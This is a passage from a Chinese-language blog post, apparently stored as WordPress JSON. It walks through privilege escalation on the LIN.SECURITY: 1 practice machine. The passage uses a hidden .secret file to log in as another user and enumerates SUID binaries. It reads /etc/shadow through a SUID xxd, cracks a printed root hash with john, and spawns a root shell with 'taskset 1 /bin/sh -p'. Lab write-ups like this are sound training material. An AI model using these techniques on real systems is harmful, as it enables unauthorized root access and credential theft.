\/><\/div><\/p>\n<h3>\u9690\u85cf\u6587\u4ef6+SID\u63d0\u6743\uff08bob-&gt;susan-&gt;root\uff09<\/h3>\n<p>\u5bfb\u627e\u4e00\u4e0b\u9690\u85cf\u6587\u4ef6\uff0c\u770b\u770b\u6709\u6ca1\u6709\u53ef\u4ee5\u5229\u7528\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">find . -type f -name &quot;.*&quot;\n# ls -alR \/home<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151439.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151439.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225013016913\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u5230\u4e00\u4e2a<code>.secret<\/code>\u53ef\u80fd\u6709\u7528\uff0c\u770b\u4e00\u4e0b\u662f\u5565\uff0c\u5c1d\u8bd5\u767b\u5f55\u5230susan\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151440.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151440.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225013346414\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b<code>SID<\/code>\u7a0b\u5e8f\u6709\u54ea\u4e9b\uff1a<\/p>\n<pre><code class=\"language-bash\">find \/ -perm -4000 -type f -exec ls -al {} \\; 2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-text\">-rwsr-xr-x 1 root root 40152 Nov 30  2017 \/snap\/core\/4917\/bin\/mount\n-rwsr-xr-x 1 root root 44168 May  7  2014 \/snap\/core\/4917\/bin\/ping\n-rwsr-xr-x 1 root root 44680 May  7  2014 \/snap\/core\/4917\/bin\/ping6\n-rwsr-xr-x 1 root root 40128 May 17  2017 \/snap\/core\/4917\/bin\/su\n-rwsr-xr-x 1 root root 27608 Nov 30  2017 \/snap\/core\/4917\/bin\/umount\n-rwsr-xr-x 1 root root 71824 May 17  2017 \/snap\/core\/4917\/usr\/bin\/chfn\n-rwsr-xr-x 1 root root 40432 May 17  2017 \/snap\/core\/4917\/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 75304 May 17  2017 \/snap\/core\/4917\/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 39904 May 17  2017 \/snap\/core\/4917\/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 54256 May 17  2017 \/snap\/core\/4917\/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 136808 Jul  4  2017 \/snap\/core\/4917\/usr\/bin\/sudo\n-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 \/snap\/core\/4917\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 428240 Jan 18  2018 \/snap\/core\/4917\/usr\/lib\/openssh\/ssh-keysign\n-rwsr-sr-x 1 root root 98440 Jun 21  2018 \/snap\/core\/4917\/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-- 1 root dip 390888 Jan 29  2016 \/snap\/core\/4917\/usr\/sbin\/pppd\n-rwsr-xr-x 1 root root 40152 Nov 30  2017 \/snap\/core\/4486\/bin\/mount\n-rwsr-xr-x 1 root root 44168 May  7  2014 \/snap\/core\/4486\/bin\/ping\n-rwsr-xr-x 1 root root 44680 May  7  2014 \/snap\/core\/4486\/bin\/ping6\n-rwsr-xr-x 1 root root 40128 May 17  2017 \/snap\/core\/4486\/bin\/su\n-rwsr-xr-x 1 root root 27608 Nov 30  2017 \/snap\/core\/4486\/bin\/umount\n-rwsr-xr-x 1 root root 71824 May 17  2017 \/snap\/core\/4486\/usr\/bin\/chfn\n-rwsr-xr-x 1 root root 40432 May 17  2017 \/snap\/core\/4486\/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 75304 May 17  2017 \/snap\/core\/4486\/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 39904 May 17  2017 \/snap\/core\/4486\/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 54256 May 17  2017 \/snap\/core\/4486\/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 136808 Jul  4  2017 \/snap\/core\/4486\/usr\/bin\/sudo\n-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 \/snap\/core\/4486\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 428240 Jan 18  2018 \/snap\/core\/4486\/usr\/lib\/openssh\/ssh-keysign\n-rwsr-sr-x 1 root root 94344 Apr 16  2018 \/snap\/core\/4486\/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-- 1 root dip 390888 Jan 29  2016 \/snap\/core\/4486\/usr\/sbin\/pppd\n-rwsr-xr-x 1 root root 64424 Mar  9  2017 \/bin\/ping\n-rwsr-xr-x 1 root root 30800 Aug 11  2016 \/bin\/fusermount\n-rwsr-xr-x 1 root root 26696 May 16  2018 \/bin\/umount\n-rwsr-xr-x 1 root root 146128 Nov 30  2017 \/bin\/ntfs-3g\n-rwsr-xr-x 1 root root 44664 Jan 25  2018 \/bin\/su\n-rwsr-xr-x 1 root root 43088 May 16  2018 \/bin\/mount\n-rwsr-xr-x 1 root root 22520 Mar 27  2018 \/usr\/bin\/pkexec\n-rwsr-xr-x 1 root root 18640 Oct 27  2016 \/usr\/bin\/netkit-rlogin\n-rwsr-x--- 1 root itservices 18552 Apr 10  2018 \/usr\/bin\/xxd      --&gt;xxd \u547d\u4ee4\u7528\u4e8e\u4f7f\u7528\u4e8c\u8fdb\u5236\u6216\u5341\u516d\u8fdb\u5236\u683c\u5f0f\u663e\u793a\u6587\u4ef6\u5185\u5bb9\n-rwsr-xr-x 1 root root 37136 Jan 25  2018 \/usr\/bin\/newgidmap\n-rwsr-xr-x 1 root root 40344 Jan 25  2018 \/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 149080 Jan 18  2018 \/usr\/bin\/sudo\n-rwsr-xr-x 1 root root 22728 Oct 27  2016 \/usr\/bin\/netkit-rcp\n-rwsr-xr-x 1 root root 76496 Jan 25  2018 \/usr\/bin\/chfn\n-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 \/usr\/bin\/at\n-rwsr-xr-x 1 root root 75824 Jan 25  2018 \/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 44528 Jan 25  2018 \/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 18448 Mar  9  2017 \/usr\/bin\/traceroute6.iputils\n-rwsr-xr-x 1 root root 37136 Jan 25  2018 \/usr\/bin\/newuidmap\n-rwsr-xr-x 1 root root 14504 Oct 27  2016 \/usr\/bin\/netkit-rsh\n-rwsr-sr-x 1 root root 30800 May 16  2018 \/usr\/bin\/taskset\n-rwsr-xr-x 1 root root 59640 Jan 25  2018 \/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 10232 Mar 28  2017 \/usr\/lib\/eject\/dmcrypt-get-device\n-rwsr-xr-- 1 root messagebus 42992 Nov 15  2017 \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 80056 Jun  5  2018 \/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n-rwsr-xr-x 1 root root 436552 Feb 10  2018 \/usr\/lib\/openssh\/ssh-keysign\n-rwsr-xr-x 1 root root 14328 Mar 27  2018 \/usr\/lib\/policykit-1\/polkit-agent-helper-1\n-rwsr-sr-x 1 root root 101208 May 16  2018 \/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-x 1 root root 113336 Jan 16  2018 \/sbin\/mount.nfs<\/code><\/pre>\n<p>\u4f7f\u7528<code>xxd<\/code>\u547d\u4ee4\u8bfb\u53d6<code>shadow<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">xxd \/etc\/shadow | xxd -r<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7834\u8bd1<code>root<\/code>\u7684\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\necho &#039;root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::&#039; &gt; flag.txt   \n# \u53ea\u80fd\u662f\u5355\u5f15\u53f7\uff0c\u53cc\u5f15\u53f7\u4e0d\u884c\uff01\uff01\uff01\uff01\njohn flag.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151441.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151441.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225014300677\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151442.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151442.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225014448067\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n<h3>SUID\u63d0\u6743(bob and peter)<\/h3>\n<p>\u5148\u67e5\u627e\u4e00\u4e0bSUID\u6587\u4ef6\u6709\u54ea\u4e9b\uff1a<\/p>\n<pre><code class=\"language-bash\">find \/ -perm -u=s -type f 2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-text\">\/snap\/core\/4917\/bin\/mount\n\/snap\/core\/4917\/bin\/ping\n\/snap\/core\/4917\/bin\/ping6\n\/snap\/core\/4917\/bin\/su\n\/snap\/core\/4917\/bin\/umount\n\/snap\/core\/4917\/usr\/bin\/chfn\n\/snap\/core\/4917\/usr\/bin\/chsh\n\/snap\/core\/4917\/usr\/bin\/gpasswd\n\/snap\/core\/4917\/usr\/bin\/newgrp\n\/snap\/core\/4917\/usr\/bin\/passwd\n\/snap\/core\/4917\/usr\/bin\/sudo\n\/snap\/core\/4917\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core\/4917\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core\/4917\/usr\/lib\/snapd\/snap-confine\n\/snap\/core\/4917\/usr\/sbin\/pppd\n\/snap\/core\/4486\/bin\/mount\n\/snap\/core\/4486\/bin\/ping\n\/snap\/core\/4486\/bin\/ping6\n\/snap\/core\/4486\/bin\/su\n\/snap\/core\/4486\/bin\/umount\n\/snap\/core\/4486\/usr\/bin\/chfn\n\/snap\/core\/4486\/usr\/bin\/chsh\n\/snap\/core\/4486\/usr\/bin\/gpasswd\n\/snap\/core\/4486\/usr\/bin\/newgrp\n\/snap\/core\/4486\/usr\/bin\/passwd\n\/snap\/core\/4486\/usr\/bin\/sudo\n\/snap\/core\/4486\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core\/4486\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core\/4486\/usr\/lib\/snapd\/snap-confine\n\/snap\/core\/4486\/usr\/sbin\/pppd\n\/bin\/ping\n\/bin\/fusermount\n\/bin\/umount\n\/bin\/ntfs-3g\n\/bin\/su\n\/bin\/mount\n\/usr\/bin\/pkexec\n\/usr\/bin\/netkit-rlogin\n\/usr\/bin\/xxd\n\/usr\/bin\/newgidmap\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/netkit-rcp\n\/usr\/bin\/chfn\n\/usr\/bin\/at\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/newuidmap\n\/usr\/bin\/netkit-rsh\n\/usr\/bin\/taskset                         -&gt;\u5229\u7528\u70b9\n\/usr\/bin\/passwd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/snapd\/snap-confine\n\/sbin\/mount.nfs<\/code><\/pre>\n<pre><code class=\"language-bash\">taskset 1 \/bin\/sh -p<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151443.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151443.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225014914458\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u53c2\u8003blog<\/h2>\n<p><a href=\"https:\/\/www.c0dedead.io\/lin-security-1-walkthrough\/\uff08\u5f88\u725b\u7684\u5e08\u5085\">https:\/\/www.c0dedead.io\/lin-security-1-walkthrough\/\uff08\u5f88\u725b\u7684\u5e08\u5085<\/a>\uff09<\/p>\n<p><a href=\"https:\/\/www.freebuf.com\/consult\/260506.html\">https:\/\/www.freebuf.com\/consult\/260506.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/104055565\">https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/104055565<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_35782055\/article\/details\/129654291\uff08\u770b\u4e86\u5e08\u5085\u7684blog\u624d\u628a\u7f51\u5361\u914d\u7f6e\u4e0a\u53bb\u7684\">https:\/\/blog.csdn.net\/qq_35782055\/article\/details\/129654291\uff08\u770b\u4e86\u5e08\u5085\u7684blog\u624d\u628a\u7f51\u5361\u914d\u7f6e\u4e0a\u53bb\u7684<\/a>\uff01\uff01\uff01\uff01\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"<p>LIN.SECURITY: 1 \u914d\u7f6e\u7f51\u5361 \u9776\u573a\u914d\u7f6e\u4e3aNAT\uff0c\u5c1d\u8bd5\u626b\u63cf\uff1a \u6ca1\u626b\u51fa\u6765\uff0c\u770b\u4e00\u4e0b\u63cf\u8ff0\uff0c\u7ed9\u51fa\u4e86\u4e00\u4e2a\u4f4e\u6743\u9650 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-379","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/379","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=379"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/379\/revisions"}],"predecessor-version":[{"id":380,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/379\/revisions\/380"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=379"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=379"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}